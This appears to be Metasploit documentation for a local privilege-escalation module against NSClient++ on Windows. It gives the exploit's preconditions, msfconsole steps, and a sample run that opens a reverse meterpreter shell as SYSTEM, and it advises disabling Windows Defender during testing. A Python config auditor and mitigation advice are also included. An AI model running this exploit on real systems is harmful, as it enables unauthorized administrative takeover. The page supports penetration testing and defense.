metasploit-gs/documentation/modules/exploit/windows/local/nscp_pe.md
2021-06-09 15:10:03 +02:00

## Vulnerable Application
### Description
This module allows an attacker with an unprivileged Windows account to gain admin access on a Windows system and start a shell.
For this module to work, both the web interface of NSClient++ and the `ExternalScripts` feature must be enabled.
You must also know where the NSClient++ config file is, since the module reads the admin password from it (the password is stored in clear text).
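The three preconditions above can be checked from the defender's side by reading the same config file. The following is an added audit example (not part of the module or of NSClient++); it assumes the usual nsclient.ini layout, with modules listed under `[/modules]`, the web password under `[/settings/default]`, and external scripts under `[/settings/external scripts/scripts]`, and uses a constructed sample file.

```python
import configparser

# Constructed sample mirroring the vulnerable setup described above
# (default path given on this page: C:\Program Files\NSClient++\nsclient.ini).
SAMPLE_INI = """\
[/modules]
WEBServer = enabled
ExternalScripts = enabled
CheckSystem = enabled

[/settings/default]
password = easypassword
allowed hosts = 127.0.0.1

[/settings/external scripts/scripts]
check_updates = scripts\\check_updates.bat
lrawsiaajn = C:\\Windows\\Temp\\stage.exe
"""

TRUE_VALUES = {"enabled", "1", "true", "yes"}
SCRIPTS_SECTION = "/settings/external scripts/scripts"  # assumed section name


def audit_nsclient_ini(text: str) -> dict:
    """Parse nsclient.ini text and report the settings the exploit relies on."""
    cfg = configparser.ConfigParser(strict=False, interpolation=None)
    cfg.read_string(text)  # configparser lower-cases option names
    modules = cfg["/modules"] if cfg.has_section("/modules") else {}
    default = cfg["/settings/default"] if cfg.has_section("/settings/default") else {}
    scripts = dict(cfg[SCRIPTS_SECTION]) if cfg.has_section(SCRIPTS_SECTION) else {}

    def enabled(module: str) -> bool:
        return modules.get(module, "").strip().lower() in TRUE_VALUES

    web = enabled("webserver")
    ext = enabled("externalscripts")
    password = default.get("password", "").strip()
    return {
        "web_interface_enabled": web,
        "external_scripts_enabled": ext,
        "cleartext_password": bool(password),
        # All three together are exactly what the module needs to succeed.
        "exposed": web and ext and bool(password),
        # Unfamiliar or random-looking names here (the module adds a script under a
        # random name) are worth investigating during incident response.
        "external_scripts": sorted(scripts),
    }


def audit_file(path: str) -> dict:
    """Audit a real nsclient.ini on disk."""
    with open(path, encoding="utf-8", errors="replace") as fh:
        return audit_nsclient_ini(fh.read())
```

Disabling `ExternalScripts` (or the web server) when they are not needed, and restricting who can read the config file, removes what the module depends on.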
### Installation
A vulnerable version of NSClient++ can be downloaded from [here](https://nsclient.org/download/). Then follow
this [installation guide](https://docs.nsclient.org/api/rest/) to complete the installation. Don't forget to enable the web interface
and the `ExternalScripts` feature so that the exploit can work.
## Verification Steps
The steps needed to verify that the module works:
1. Start `msfconsole`
2. `use exploit/windows/local/nscp_pe`
3. `set SESSION <session>`
4. `set FILE <NSCP_config_file>` if the NSCP config file is not `C:\Program Files\NSClient++\nsclient.ini`
5. `check` to check if the targeted NSClient++ is vulnerable
6. `set payload <choose_a_payload>` to set a specific payload to send
7. `run` the module to exploit the vulnerability, gain admin access and start a shell
## Options
### FILE
Set the path of the NSClient++ config file. If you don't know it, try the default value.
## Scenarios
This module was successfully tested on Windows 10 Home (you may need to disable Windows Defender, as the msf payload may be detected).
See the following output:
```
msf6 exploit(multi/handler) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
12 meterpreter x64/windows DESKTOP-T5N69RR\basic_user @ DESKTOP-T5N69RR 172.18.15.143:4444 -> 172.18.15.142:64307 (172.18.15.142)
msf6 exploit(nscp_pe) > set session 12
session => 12
msf6 exploit(nscp_pe) > run
[!] SESSION may not be compatible with this module (incompatible session type: meterpreter)
[*] Started reverse TCP handler on x.x.x.x:4444
[*] Executing automatic check (disable AutoCheck to override)
[+] Admin password found : easypassword
[+] NSClient web interface is enabled !
[+] The target is vulnerable. External scripts feature enabled !
[+] Admin password found : easypassword
[+] NSClient web interface is enabled !
[*] Configuring Script with Specified Payload . . .
[*] Added External Script (name: lrawsiaajn)
[*] Saving Configuration . . .
[*] Reloading Application . . .
[*] Waiting for Application to reload . . .
[*] Triggering payload, should execute shortly . . .
[*] Sending stage (200262 bytes) to y.y.y.y
[*] Meterpreter session 13 opened (x.x.x.x:4444 -> y.y.y.y:64309) at 2021-06-09 14:37:10 +0200
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
```